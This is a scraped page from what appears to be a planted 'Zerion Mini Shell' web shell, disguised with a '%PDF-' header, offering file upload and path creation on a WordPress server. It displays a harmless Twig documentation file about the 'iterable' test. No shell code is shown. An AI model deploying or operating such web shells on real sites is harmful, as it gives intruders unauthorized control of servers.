%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/knwn/wp-content/plugins/timber-library/vendor/twig/twig/doc/tests/
Upload File :
Create Path :
Current File : //var/www/knwn/wp-content/plugins/timber-library/vendor/twig/twig/doc/tests/iterable.rst

``iterable``
============

.. versionadded:: 1.7
    The iterable test was added in Twig 1.7.

``iterable`` checks if a variable is an array or a traversable object:

.. code-block:: twig

    {# evaluates to true if the foo variable is iterable #}
    {% if users is iterable %}
        {% for user in users %}
            Hello {{ user }}!
        {% endfor %}
    {% else %}
        {# users is probably a string #}
        Hello {{ users }}!
    {% endif %}

Zerion Mini Shell 1.0